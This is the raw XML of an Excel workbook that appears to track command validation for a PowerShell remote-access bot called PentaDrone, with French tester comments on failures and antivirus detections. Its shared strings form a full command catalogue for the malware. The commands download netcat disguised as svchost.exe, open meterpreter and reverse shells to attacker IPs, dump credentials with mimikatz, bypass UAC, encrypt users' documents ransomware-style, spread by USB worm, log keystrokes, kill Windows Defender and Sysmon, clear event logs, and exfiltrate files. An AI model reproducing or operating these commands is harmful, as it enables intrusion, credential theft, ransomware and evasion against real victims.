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harelab\pnt\PentaDrone\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{0CDFEFE5-8BC4-4942-9877-9622589A8835}" xr6:coauthVersionLast="41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Cmde state validation" sheetId="1" r:id="rId1"/>
    <sheet name="Exec validation" sheetId="4" r:id="rId2"/>
    <sheet name="Feuil3" sheetId="3" r:id="rId3"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">'Cmde state validation'!$A$1:$E$99</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'Exec validation'!$A$1:$B$81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bny</author>
  </authors>
  <commentList>
    <comment ref="D32" authorId="0" shapeId="0" xr:uid="{B0567CD3-6969-4F34-AEE1-B0F42D482B22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le telechargement se termine. Mais le fichier téléchargé affiche : win32 invalide !</t>
        </r>
      </text>
    </comment>
    <comment ref="D38" authorId="0" shapeId="0" xr:uid="{62BCF402-F320-4949-9A9F-B33F1F1B6200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rendre l'image visible dans l'UI</t>
        </r>
      </text>
    </comment>
    <comment ref="D39" authorId="0" shapeId="0" xr:uid="{FFA2E4E1-E801-40EE-8407-109DB2AC3924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il serait interessant de faire afficher l'image de la map directement dans le resultat sur le GUI</t>
        </r>
      </text>
    </comment>
    <comment ref="D48" authorId="0" shapeId="0" xr:uid="{8C9F27DF-3FDF-4050-AEA5-8577532E4546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AV dectect</t>
        </r>
      </text>
    </comment>
    <comment ref="D62" authorId="0" shapeId="0" xr:uid="{FA651B46-869B-4A96-A517-8F3953220B8F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s'execute bien mais n'a n'a aucun effet !!! ?</t>
        </r>
      </text>
    </comment>
    <comment ref="D75" authorId="0" shapeId="0" xr:uid="{08F10ECF-CFF8-4560-B3EE-420B181815DA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pas d'erreur d'execution, mais le reverse shell n'est pas créé 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bny</author>
  </authors>
  <commentList>
    <comment ref="B33" authorId="0" shapeId="0" xr:uid="{DF68A770-6F98-4F8D-8530-525A1C2C59E2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le telechargement se termine. Mais le fichier téléchargé affiche : win32 invalide !</t>
        </r>
      </text>
    </comment>
    <comment ref="B38" authorId="0" shapeId="0" xr:uid="{CAB7D420-60A4-4970-9E3C-C2D9DDFC5DB9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rendre l'image directement visible dans l'UI</t>
        </r>
      </text>
    </comment>
    <comment ref="B39" authorId="0" shapeId="0" xr:uid="{6B6D9AC2-78B6-4550-A9DB-2C9FF2C62AB2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rendre l'image visible dans l'UI</t>
        </r>
      </text>
    </comment>
    <comment ref="B40" authorId="0" shapeId="0" xr:uid="{2AA6E519-B2DB-4626-B5BA-6B2941E81DB4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il serait interessant de faire afficher l'image de la map directement dans le resultat sur le GUI</t>
        </r>
      </text>
    </comment>
    <comment ref="B63" authorId="0" shapeId="0" xr:uid="{2B898E51-A637-4364-ADD8-071531B9162D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s'execute bien mais n'a n'a aucun effet !!! ?</t>
        </r>
      </text>
    </comment>
    <comment ref="B64" authorId="0" shapeId="0" xr:uid="{5AA926F4-529E-4D70-BAC4-889DD31BB055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La commande s'execute mais on n'a pas de fichier</t>
        </r>
      </text>
    </comment>
    <comment ref="B76" authorId="0" shapeId="0" xr:uid="{21D42DAD-CAC1-44F0-BA33-E2F825D7E53E}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>bny:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
pas d'erreur d'execution, mais le reverse shell n'est pas créé !</t>
        </r>
      </text>
    </comment>
  </commentList>
</comments>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="460" uniqueCount="257">
  <si>
    <t xml:space="preserve">  #  !quit   -     Delete all artifacts and clean computer. The end of operations</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !hello</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !speak|you have been, hacked.</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !outlook        - List all pst archives</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !run|net localgroup adminstrators &gt; c:\windows\temp\ad.txt</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !download|http://tools.hackarmoury.com/general_tools/nc/nc.exe|c:\windows\temp\svchost.exe</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !meterpreter|10.0.0.23|443</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !eicar      -    Triggering AV alarm</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !popup|Administrative credentials are needed to install a pending update. You will be prompted shortly.|UPDATE PENDING</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !elevate|http://blahblah.com/fjdads/script.raw</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !migrate     - Inject shellcode into the process ID (default = explorer) of your choosing or within the context of the running PowerShell process.</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !ntlmspoof   - Use inveigh to peform Spoofing attack and capture various password (SMB, NTLM, HTTP, WPAD ...)</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !webinject   - Use interceptor.ps1 to inject html content in every web request </t>
  </si>
  <si>
    <t xml:space="preserve">  #  !wallpaper|http://wallpapercave.com/wp/ky43p3I.jpg/|c:\windows\temp\1.jpg</t>
  </si>
  <si>
    <t xml:space="preserve"> !geolocate</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !jsrat|192.168.10.96     # Handle connexion with: powershell.exe -Exe Bypass -File c:\test\JSRat.ps1  &amp; change listening IP ADDRESS in jsrat file</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !keylog</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !mimikatz</t>
  </si>
  <si>
    <t xml:space="preserve"> !clearevent</t>
  </si>
  <si>
    <t xml:space="preserve"> !logbypass</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !macattrib|C:\secret.txt|01/03/2006 12:12 pm</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !decrypt|Q4dsd87rn1AE5@54fDER4584S2dZFj|C:\users\</t>
  </si>
  <si>
    <t>Param 2 MUST ALWAYS END WITH "\"</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !bypassuac|powershell -exe bypass -win hidden -enc YwBhAGwAYwA=       - Bypass UAC and execute command in a privileged context.</t>
  </si>
  <si>
    <t xml:space="preserve"> #  !zip|C:\users\public\documents\|C:\users\secret.zip</t>
  </si>
  <si>
    <t>#  !beef|iexplore.exe|http://192.168.3.40:3000/demos/basic.html   Param 2 can be: firefox.exe/ opera.exe/ chrome.exe/ iexplore.exe</t>
  </si>
  <si>
    <t xml:space="preserve">#  !shellcode|@(0x90,0x90,0xC3)   -  Inject the specifyed shellcode. msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- </t>
  </si>
  <si>
    <t>#  !update --    Update c2c and every others usefull stuff</t>
  </si>
  <si>
    <t>#  !hotpotatoes|net user tater Winter2016 /add &amp;&amp; net localgroup administrators tater /add</t>
  </si>
  <si>
    <t>#  !webcam</t>
  </si>
  <si>
    <t>#  !screenshot</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !vnc|bind||5900|pass1234   OR  §vnc|reverse|IP_of_attacker|5500|pass1234</t>
  </si>
  <si>
    <t>#  !encrypt|Q4dsd87rn1AE5@54fDER4584S2dZFj|C:\users\      Param 2 MUST ALWAYS END WITH "\"    - encrypt all "doc,docx,xlx,xlsx,ppt,pptx,jpg,png,bmp,pdf,txt,log,mp3,avi,mpeg,mp4" files</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !bitcoin   # Bitcoin mining, enslave the bot ;-)</t>
  </si>
  <si>
    <t>#  !dnsspoof|127.0.0.1  facebook.com|0/1  --&gt; 1 =&gt; add, 0 =&gt; clean &amp; add</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !ddos|http://target.com</t>
  </si>
  <si>
    <t>#  !destroy the system</t>
  </si>
  <si>
    <t>#  !sendmail|target@corp.com|subject|Hello Im your friend|c:\evil.pdf    -  Send email from the compromised system</t>
  </si>
  <si>
    <t>#  !browserdump</t>
  </si>
  <si>
    <t>#  !remotemimikatz</t>
  </si>
  <si>
    <t>#  !extractlog|system</t>
  </si>
  <si>
    <t>Cat</t>
  </si>
  <si>
    <t>spy</t>
  </si>
  <si>
    <t>files</t>
  </si>
  <si>
    <t>antiforensics</t>
  </si>
  <si>
    <t>ops</t>
  </si>
  <si>
    <t>throll</t>
  </si>
  <si>
    <t>exploration</t>
  </si>
  <si>
    <t>persist</t>
  </si>
  <si>
    <t>privesc</t>
  </si>
  <si>
    <t>spoff sniff</t>
  </si>
  <si>
    <t>inject drop</t>
  </si>
  <si>
    <t>pivoting</t>
  </si>
  <si>
    <t>creds</t>
  </si>
  <si>
    <t>recon scan</t>
  </si>
  <si>
    <t>downexec</t>
  </si>
  <si>
    <t>exfil</t>
  </si>
  <si>
    <t>shell</t>
  </si>
  <si>
    <t>encrypt</t>
  </si>
  <si>
    <t>mining</t>
  </si>
  <si>
    <t>Etat</t>
  </si>
  <si>
    <t>No</t>
  </si>
  <si>
    <t>medium</t>
  </si>
  <si>
    <t>Good</t>
  </si>
  <si>
    <t xml:space="preserve"> !killsysmon</t>
  </si>
  <si>
    <t>Syntaxe</t>
  </si>
  <si>
    <t>Recon</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>Defense Evasion</t>
  </si>
  <si>
    <t>Credential access</t>
  </si>
  <si>
    <t>Discovery</t>
  </si>
  <si>
    <t>Lateral Move</t>
  </si>
  <si>
    <t>Execution</t>
  </si>
  <si>
    <t>Collection</t>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>Command Control</t>
  </si>
  <si>
    <t>Delivery</t>
  </si>
  <si>
    <t>Shell</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !sniff|10</t>
  </si>
  <si>
    <t>Management</t>
  </si>
  <si>
    <t>Trolling</t>
  </si>
  <si>
    <t>Privilege Escalation</t>
  </si>
  <si>
    <t xml:space="preserve">#  !exfiltrate|doc|C:\users\    </t>
  </si>
  <si>
    <t xml:space="preserve"> #  !exfilfile|C:\users\secret.zip</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !sleeps|10|60|90</t>
  </si>
  <si>
    <t xml:space="preserve"> !geolocategps</t>
  </si>
  <si>
    <t xml:space="preserve"> #  !privesc</t>
  </si>
  <si>
    <t>#  !adduser|johndoe|p@s5w0rd|domain</t>
  </si>
  <si>
    <t>!procdump</t>
  </si>
  <si>
    <t>!firewall</t>
  </si>
  <si>
    <t># !procdump    -  dump process - usefull to use offline mimikatz</t>
  </si>
  <si>
    <t>!http</t>
  </si>
  <si>
    <t>!firewall|on / off   - Activate or Desactivate firewall</t>
  </si>
  <si>
    <t># !http|80    -    Run http server on specified port and host dedicted files</t>
  </si>
  <si>
    <t># !phish|facebook.com|http://xxxxx.ngrok.io/facebook</t>
  </si>
  <si>
    <t>!reverseshell</t>
  </si>
  <si>
    <t>!phish</t>
  </si>
  <si>
    <t>!httprat</t>
  </si>
  <si>
    <t># !reverseshell|attackerIP|AttackerPort</t>
  </si>
  <si>
    <t># !httprat|212.74.21.23  OR  !httprat|xxxxxx.ngrok.io   (without HTTP/s)</t>
  </si>
  <si>
    <t>#  !pthsmb  Pass the hash</t>
  </si>
  <si>
    <t>#  !pthwmi</t>
  </si>
  <si>
    <t>!enumshare</t>
  </si>
  <si>
    <t>#!enumshare|toto|F8580EAGFH89725</t>
  </si>
  <si>
    <t>#!enumsession|toto|F8580EAGFH89725</t>
  </si>
  <si>
    <t>!enumsession</t>
  </si>
  <si>
    <t>!explorer</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !hashdump</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !changec2|http:\newc2cserver.com</t>
  </si>
  <si>
    <t>!sherlock -  Detect Privesc vulns</t>
  </si>
  <si>
    <t xml:space="preserve">!sherlock </t>
  </si>
  <si>
    <t>!bits|http://tools.com/nc.exe|c:\windows\temp\svchost.exe</t>
  </si>
  <si>
    <t>!bits</t>
  </si>
  <si>
    <t xml:space="preserve">#!explorer|1|  &gt;only list share -   !explorer|0|C:\users  &gt;only list specified local folder  -  !explorer|1|C:\users  &gt;list shares and specified local folder </t>
  </si>
  <si>
    <t>#  !thunder|http://www.youtube.com/watch?v=v2AC41dglnM</t>
  </si>
  <si>
    <t>!thunder</t>
  </si>
  <si>
    <t>!ngrok</t>
  </si>
  <si>
    <t>wmic</t>
  </si>
  <si>
    <t>pnt-AvBypass.ps1</t>
  </si>
  <si>
    <t>pnt-Direct.bat</t>
  </si>
  <si>
    <t>pnt.bat</t>
  </si>
  <si>
    <t>certutil.bat</t>
  </si>
  <si>
    <t>mshta</t>
  </si>
  <si>
    <t>rundll</t>
  </si>
  <si>
    <t>winrm</t>
  </si>
  <si>
    <t>hta</t>
  </si>
  <si>
    <t>js</t>
  </si>
  <si>
    <t>lnk</t>
  </si>
  <si>
    <t>png</t>
  </si>
  <si>
    <t>sct</t>
  </si>
  <si>
    <t>usb</t>
  </si>
  <si>
    <t>vbs</t>
  </si>
  <si>
    <t>AV detect</t>
  </si>
  <si>
    <t>Fail</t>
  </si>
  <si>
    <t>Shielded-Launcher</t>
  </si>
  <si>
    <t>mais start ne marche pas sur mon cmd !</t>
  </si>
  <si>
    <t>it also use rundll32</t>
  </si>
  <si>
    <t>la taille deu texte de commande n'est pas suffisante dans le lnk</t>
  </si>
  <si>
    <t>utilise regsvr32</t>
  </si>
  <si>
    <t>AV detect dans le generateur même</t>
  </si>
  <si>
    <t>C'est pas le bon script generé (ça c'est pour macro)</t>
  </si>
  <si>
    <t>!vector</t>
  </si>
  <si>
    <t>!getpid</t>
  </si>
  <si>
    <t>!whoami</t>
  </si>
  <si>
    <t>!exfilonedriv</t>
  </si>
  <si>
    <t>!checkwmi</t>
  </si>
  <si>
    <t>#  !usbspread|on|YwBhAGwAYwA=     - Infect USB with malicious lnk</t>
  </si>
  <si>
    <t xml:space="preserve"> #  !psexec|domain\admin|password|192.168.3.202|powershell.exe 'calc.exe'    - download psexec, use credential and push bot in targeted ip </t>
  </si>
  <si>
    <t xml:space="preserve"> # !ngrok|AUTHKEYAUTHKEY|http|80   - Expose zombie(TCP/IP) PC to Internet so that you can connect any tools</t>
  </si>
  <si>
    <t>#  !pivot     - download psexec, use credential and push bot in every ip in the LAN</t>
  </si>
  <si>
    <t xml:space="preserve">!wshell </t>
  </si>
  <si>
    <t xml:space="preserve"> #  !wshell|8080  -  use it with !tunnel to expose localhost port 8080 over Internet</t>
  </si>
  <si>
    <t xml:space="preserve">!rdp            </t>
  </si>
  <si>
    <t xml:space="preserve"> !rdp</t>
  </si>
  <si>
    <t>ANNULE</t>
  </si>
  <si>
    <t>macro</t>
  </si>
  <si>
    <t>!acl</t>
  </si>
  <si>
    <t>!dropboxc2</t>
  </si>
  <si>
    <t xml:space="preserve">  # !persist|reg / startup / task / wmi / all |Custom_command</t>
  </si>
  <si>
    <t># !streaming|on / off - take screenshot at every hello (active spy)</t>
  </si>
  <si>
    <t xml:space="preserve">  #!downexec|ps1/exe|http://url.com/file|file -  example !downexec|ps1|http://script.com/Invoke-DBC2.ps1 |Invoke-DBC2 -Arguments    OR !downexec|exe|http://script.com/bin.exe |-i user -c pc</t>
  </si>
  <si>
    <t>#  !choco  - install Choco and some usefull plug</t>
  </si>
  <si>
    <t>#  !pshupgrade  --  upgrade powershell version</t>
  </si>
  <si>
    <t xml:space="preserve">!pthsmb      </t>
  </si>
  <si>
    <t>!pthwmi</t>
  </si>
  <si>
    <t xml:space="preserve">!worm </t>
  </si>
  <si>
    <t xml:space="preserve">!adduser </t>
  </si>
  <si>
    <t xml:space="preserve">!streaming </t>
  </si>
  <si>
    <t xml:space="preserve">!choco            </t>
  </si>
  <si>
    <t xml:space="preserve">!aptget           </t>
  </si>
  <si>
    <t xml:space="preserve">!pshupgrade     </t>
  </si>
  <si>
    <t>!browserdump</t>
  </si>
  <si>
    <t xml:space="preserve">#!backdoorlnk </t>
  </si>
  <si>
    <t>!bypassuac</t>
  </si>
  <si>
    <t xml:space="preserve">!sniff </t>
  </si>
  <si>
    <t xml:space="preserve">!killsysmon </t>
  </si>
  <si>
    <t xml:space="preserve">!sendmail </t>
  </si>
  <si>
    <t xml:space="preserve">#!destroy </t>
  </si>
  <si>
    <t xml:space="preserve">#!ddos          </t>
  </si>
  <si>
    <t xml:space="preserve">!dnsspoof       </t>
  </si>
  <si>
    <t xml:space="preserve">!bitcoin </t>
  </si>
  <si>
    <t xml:space="preserve">!decrypt </t>
  </si>
  <si>
    <t xml:space="preserve">!encrypt        </t>
  </si>
  <si>
    <t>!macattrib</t>
  </si>
  <si>
    <t xml:space="preserve">!extractlog   </t>
  </si>
  <si>
    <t xml:space="preserve">!logbypass      </t>
  </si>
  <si>
    <t xml:space="preserve">!clearevent     </t>
  </si>
  <si>
    <t>!mimikatz</t>
  </si>
  <si>
    <t>!remotemimikatz</t>
  </si>
  <si>
    <t xml:space="preserve">!hashdump </t>
  </si>
  <si>
    <t xml:space="preserve"> !keylog </t>
  </si>
  <si>
    <t xml:space="preserve">!credential  </t>
  </si>
  <si>
    <t xml:space="preserve"> !vnc               </t>
  </si>
  <si>
    <t xml:space="preserve"> !jsrat </t>
  </si>
  <si>
    <t>!geolocategps</t>
  </si>
  <si>
    <t xml:space="preserve"> !screenshot </t>
  </si>
  <si>
    <t xml:space="preserve">!webcam        </t>
  </si>
  <si>
    <t>!wallpaper</t>
  </si>
  <si>
    <t>!usbspread</t>
  </si>
  <si>
    <t xml:space="preserve"> !shellcode </t>
  </si>
  <si>
    <t xml:space="preserve">!psexec </t>
  </si>
  <si>
    <t>!pivot</t>
  </si>
  <si>
    <t xml:space="preserve">!hotpotatoes      </t>
  </si>
  <si>
    <t>!webinject</t>
  </si>
  <si>
    <t xml:space="preserve">!ntlmspoof </t>
  </si>
  <si>
    <t xml:space="preserve">!migrate </t>
  </si>
  <si>
    <t xml:space="preserve">!privesc </t>
  </si>
  <si>
    <t xml:space="preserve"> !elevate </t>
  </si>
  <si>
    <t xml:space="preserve"> !persist </t>
  </si>
  <si>
    <t xml:space="preserve">!popup </t>
  </si>
  <si>
    <t xml:space="preserve"> !eicar </t>
  </si>
  <si>
    <t xml:space="preserve"> !sleeps</t>
  </si>
  <si>
    <t xml:space="preserve"> !meterpreter</t>
  </si>
  <si>
    <t xml:space="preserve"> !url </t>
  </si>
  <si>
    <t xml:space="preserve"> !download </t>
  </si>
  <si>
    <t xml:space="preserve"> !downexec</t>
  </si>
  <si>
    <t xml:space="preserve">!run </t>
  </si>
  <si>
    <t xml:space="preserve">!outlook </t>
  </si>
  <si>
    <t xml:space="preserve"> !exfiltrate </t>
  </si>
  <si>
    <t xml:space="preserve">!zip              </t>
  </si>
  <si>
    <t xml:space="preserve">!exfilfile  </t>
  </si>
  <si>
    <t xml:space="preserve">!update        </t>
  </si>
  <si>
    <t xml:space="preserve">!recon      </t>
  </si>
  <si>
    <t xml:space="preserve"> !speak </t>
  </si>
  <si>
    <t xml:space="preserve">!beef            </t>
  </si>
  <si>
    <t xml:space="preserve"> !changec2</t>
  </si>
  <si>
    <t xml:space="preserve"> !hello </t>
  </si>
  <si>
    <t xml:space="preserve">!quit </t>
  </si>
  <si>
    <t>Validate CMD</t>
  </si>
  <si>
    <t xml:space="preserve"> # !aptget|php OR !aptget|python2 OR !aptget|curl OR !aptget|wget - install package linux-like using CHOCOLATEY. You  must first run !choco</t>
  </si>
  <si>
    <t>!windefkill</t>
  </si>
  <si>
    <t># !extractkey    OR remotely: !extractkey|domain\admin|password</t>
  </si>
  <si>
    <t>!extractkey</t>
  </si>
  <si>
    <t># !url|iexplore.exe|on / off|http://www.youtube.com/watch?v=dQw4w9WgXcQ</t>
  </si>
  <si>
    <t>#  !windefkill   OR !windefkill|10.10.10.2   -  Kill Windows Defender locally or remotely</t>
  </si>
  <si>
    <t xml:space="preserve">  #  !worm|login|password  - another way to move laterally but in a virally way</t>
  </si>
  <si>
    <t>!geolocate</t>
  </si>
  <si>
    <t xml:space="preserve">!wcry     </t>
  </si>
  <si>
    <t xml:space="preserve">!scan </t>
  </si>
  <si>
    <t># !checkwmi  --  Verify WMI value</t>
  </si>
  <si>
    <t>!acl|c:\users\toto.txt    --   Get NTFS permissions applied to a file</t>
  </si>
  <si>
    <t xml:space="preserve"> #  !scan       -    Network port scanning like with Nmap, all over the LAN</t>
  </si>
  <si>
    <t xml:space="preserve"> #  !recon</t>
  </si>
  <si>
    <t xml:space="preserve"> #  !wcry       -    Check system against WannaCry MS17-010 vulnerability</t>
  </si>
  <si>
    <t>#  !credential  -  Try to Phish windows credentials and test it before storing it</t>
  </si>
  <si>
    <t>!nc</t>
  </si>
  <si>
    <t xml:space="preserve"> !proxy|213.18.200.13|8484 - Set proxy configuration. you can use fiddler here to see HTTPS. or setup your own proxy </t>
  </si>
  <si>
    <t>!proxy</t>
  </si>
  <si>
    <t>!nc|212.74.21.23  OR  !nc|xxxxxx.ngrok.io   - RUN BEFORE Server side: nc —v —l —p (port)</t>
  </si>
  <si>
    <t>!portfwd|33389|127.0.0.1|3389 -- Create a simple tcp port forward</t>
  </si>
  <si>
    <t>!portfwd</t>
  </si>
  <si>
    <t>!socks|1234 -- Create a Socks 4/5 proxy on port 1234, configure your browser to use socks and browse in the context of this pc</t>
  </si>
  <si>
    <t>!c2channel</t>
  </si>
  <si>
    <t>!c2channel|gmail|http:\\server\config.ini</t>
  </si>
  <si>
    <t>!socks</t>
  </si>
  <si>
    <t>!bypassuac|net user toto /add   OR !bypassuac</t>
  </si>
  <si>
    <t>!vector|SBOFSBOFSBOF==    Change the encoded string of payload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</si>
</sst>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wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1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/>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="0" xfId="0" applyFill="1"/>
  </cellXfs>
  <cellStyles count="1">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="5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ont>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <color theme="0"/>
      </font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U99"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A49" zoomScale="80" zoomScaleNormal="80" workbookViewId="0">
      <selection activeCell="D87" sqref="D87"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="3.5703125" customWidth="1"/>
    <col min="2" max="2" width="20.5703125" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="20" style="1" customWidth="1"/>
    <col min="4" max="4" width="11.7109375" style="6" customWidth="1"/>
    <col min="5" max="5" width="93.7109375" customWidth="1"/>
    <col min="10" max="10" width="11.42578125" customWidth="1"/>
    <col min="11" max="11" width="11.85546875" customWidth="1"/>
    <col min="16" max="16" width="53.5703125" customWidth="1"/>
    <col min="17" max="17" width="19.140625" customWidth="1"/>
    <col min="21" max="21" width="12.85546875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:21" s="4" customFormat="1" ht="15.75" x14ac:dyDescent="0.25">
      <c r="B1" s="2" t="s">
        <v>41</v>
      </c>
      <c r="C1" s="3" t="s">
        <v>228</v>
      </c>
      <c r="D1" s="5" t="s">
        <v>60</v>
      </c>
      <c r="E1" s="7" t="s">
        <v>65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1" x14ac:dyDescent="0.25">
      <c r="A2">
        <v>1</v>
      </c>
      <c r="B2" t="s">
        <v>79</v>
      </c>
      <c r="C2" s="1" t="s">
        <v>227</v>
      </c>
      <c r="E2" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A3">
        <v>2</v>
      </c>
      <c r="B3" t="s">
        <v>79</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>226</v>
      </c>
      <c r="D3" s="6" t="s">
        <v>63</v>
      </c>
      <c r="E3" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="4" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A4">
        <v>3</v>
      </c>
      <c r="B4" t="s">
        <v>79</v>
      </c>
      <c r="C4" s="1" t="s">
        <v>225</v>
      </c>
      <c r="D4" s="6" t="s">
        <v>63</v>
      </c>
      <c r="E4" t="s">
        <v>108</v>
      </c>
      <c r="Q4" t="s">
        <v>66</v>
      </c>
      <c r="U4" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="5" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A5">
        <v>4</v>
      </c>
      <c r="B5" t="s">
        <v>75</v>
      </c>
      <c r="C5" s="1" t="s">
        <v>224</v>
      </c>
      <c r="D5" s="6" t="s">
        <v>63</v>
      </c>
      <c r="E5" t="s">
        <v>25</v>
      </c>
      <c r="Q5" t="s">
        <v>67</v>
      </c>
      <c r="R5" t="s">
        <v>43</v>
      </c>
      <c r="S5" t="s">
        <v>63</v>
      </c>
      <c r="U5" t="s">
        <v>44</v>
      </c>
    </row>
    <row r="6" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A6">
        <v>5</v>
      </c>
      <c r="B6" t="s">
        <v>80</v>
      </c>
      <c r="C6" s="1" t="s">
        <v>223</v>
      </c>
      <c r="D6" s="6" t="s">
        <v>63</v>
      </c>
      <c r="E6" t="s">
        <v>2</v>
      </c>
      <c r="Q6" t="s">
        <v>81</v>
      </c>
      <c r="S6" t="s">
        <v>61</v>
      </c>
      <c r="U6" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="7" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A7">
        <v>6</v>
      </c>
      <c r="B7" t="s">
        <v>70</v>
      </c>
      <c r="C7" s="1" t="s">
        <v>222</v>
      </c>
      <c r="D7" s="6" t="s">
        <v>63</v>
      </c>
      <c r="E7" t="s">
        <v>242</v>
      </c>
      <c r="Q7" t="s">
        <v>68</v>
      </c>
      <c r="S7" t="s">
        <v>62</v>
      </c>
      <c r="U7" t="s">
        <v>46</v>
      </c>
    </row>
    <row r="8" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A8">
        <v>7</v>
      </c>
      <c r="B8" t="s">
        <v>79</v>
      </c>
      <c r="C8" s="1" t="s">
        <v>221</v>
      </c>
      <c r="E8" t="s">
        <v>27</v>
      </c>
      <c r="Q8" t="s">
        <v>69</v>
      </c>
      <c r="S8" t="s">
        <v>154</v>
      </c>
      <c r="U8" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="9" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A9">
        <v>8</v>
      </c>
      <c r="B9" t="s">
        <v>74</v>
      </c>
      <c r="C9" s="1" t="s">
        <v>220</v>
      </c>
      <c r="D9" s="6" t="s">
        <v>63</v>
      </c>
      <c r="E9" t="s">
        <v>83</v>
      </c>
      <c r="Q9" t="s">
        <v>70</v>
      </c>
      <c r="R9" t="s">
        <v>47</v>
      </c>
      <c r="U9" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="10" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A10">
        <v>9</v>
      </c>
      <c r="B10" t="s">
        <v>74</v>
      </c>
      <c r="C10" s="1" t="s">
        <v>219</v>
      </c>
      <c r="D10" s="6" t="s">
        <v>61</v>
      </c>
      <c r="E10" t="s">
        <v>24</v>
      </c>
      <c r="Q10" t="s">
        <v>71</v>
      </c>
      <c r="U10" t="s">
        <v>50</v>
      </c>
    </row>
    <row r="11" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A11">
        <v>10</v>
      </c>
      <c r="B11" t="s">
        <v>74</v>
      </c>
      <c r="C11" s="1" t="s">
        <v>218</v>
      </c>
      <c r="D11" s="6" t="s">
        <v>63</v>
      </c>
      <c r="E11" t="s">
        <v>82</v>
      </c>
      <c r="Q11" t="s">
        <v>72</v>
      </c>
      <c r="U11" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="12" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A12">
        <v>11</v>
      </c>
      <c r="B12" t="s">
        <v>73</v>
      </c>
      <c r="C12" s="1" t="s">
        <v>217</v>
      </c>
      <c r="E12" t="s">
        <v>3</v>
      </c>
      <c r="Q12" t="s">
        <v>73</v>
      </c>
      <c r="U12" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="13" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A13">
        <v>12</v>
      </c>
      <c r="B13" t="s">
        <v>72</v>
      </c>
      <c r="C13" s="1" t="s">
        <v>216</v>
      </c>
      <c r="D13" s="6" t="s">
        <v>63</v>
      </c>
      <c r="E13" t="s">
        <v>4</v>
      </c>
      <c r="Q13" t="s">
        <v>74</v>
      </c>
      <c r="U13" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="14" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A14">
        <v>13</v>
      </c>
      <c r="B14" t="s">
        <v>72</v>
      </c>
      <c r="C14" s="1" t="s">
        <v>215</v>
      </c>
      <c r="E14" t="s">
        <v>160</v>
      </c>
      <c r="Q14" t="s">
        <v>75</v>
      </c>
      <c r="U14" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="15" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A15">
